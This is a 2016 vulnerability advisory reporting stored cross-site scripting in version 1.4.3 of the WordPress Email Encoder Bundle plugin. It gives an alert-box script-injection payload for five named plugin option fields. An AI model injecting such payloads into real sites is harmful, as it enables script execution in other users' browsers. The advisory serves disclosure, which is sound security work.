================================================================================ # WordPress Email Encoder Bundle 1.4.3 - Stored Cross Site Scripting ================================================================================ # Author: Ehsan Hosseini # Vendor Homepage: https://wordpress.org/plugins/email-encoder-bundle/ # Software Link : https://downloads.wordpress.org/plugin/email-encoder-bundle.1.4.3.zip # Version : 1.4.3 # Date: 12/03/2016 # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/wpemailencoderbundle-xss.txt ================================================================================ # Vulnerability Details : Type : Stored XSS Minimum Level of Access Required : Change Plugin Values. # PoC : In the following fields put the payload as below http://localhost/wordpress/wp-admin/admin.php?page=wp_external_links Vulnerable Parameter : WP_Email_Encoder_Bundle_options[class_name] = "><script>alert('Ehsan Cod3r')</script> WP_Email_Encoder_Bundle_options[protection_text] = "><script>alert('Ehsan Cod3r')</script> WP_Email_Encoder_Bundle_options[protection_text_content] = "><script>alert('Ehsan Cod3r')</script> WP_Email_Encoder_Bundle_options[skip_posts] = "><script>alert('Ehsan Cod3r')</script> WP_Email_Encoder_Bundle_options[protection_text_rss] = "><script>alert('Ehsan Cod3r')</script> ================================================================================ # Ya Fateme! In Roza Hishki Javab Salam Ali Ro Nmide ! In Roza Kasi Az Hal Emam Zaman Khabar Nadre ! Vay Madaram! ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir)